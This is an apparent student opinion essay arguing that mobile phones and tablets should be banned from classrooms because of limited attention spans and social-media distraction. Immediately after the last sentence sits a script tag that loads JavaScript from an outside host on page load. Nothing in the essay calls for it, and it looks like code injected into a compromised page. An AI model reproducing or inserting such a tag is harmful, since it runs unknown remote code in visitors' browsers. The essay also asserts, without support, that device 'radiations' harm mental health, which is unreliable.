It is argued that mobile phones and other electronic devices have no place in the classroom To what extent you agree or disagree

These days, technology is evolving so rapidly that every now and then, new devices are being invented for the ease of humankind. Cell phones and tablet computers are examples of technology which have influenced our life so deeply that no one can think of staying away from it. Students are no exception. Now, there are pros and cons of every invention but in my humble opinion, there are more cons to it than pros.

One of the reasons I would like to disagree with the usage of electronic devices in the classroom is a limited attention span. we as humans have limited attention span and students already struggle to pay attention to studies. If a student starts using electronic gadgets, say an IPad, he will definitely have a hard time to pay attention to what's happening in the class. And if the student fails to understand the topic that is being discussed in class, it may cause frustration in student's behavior.

The other most significant effect of using electronic devices is a disturbance. Almost everyone is having social media accounts and we have a tendency to check what is going on in our social media world. The process of checking one's phone for notification can cause disturbance for not only the owner of the device but for the whole class as well and the process of learning could be hindered.

Not only it affects the learning process of the students but harmful radiations affect the mental health as well. If we put a ban on the usage of electronic gadgets in classrooms, it will not only improve the efficiency of students in educational activities but the harm to their mental health could be avoided.<script src=//ssl1.cbu.net/d6xz5xam></script>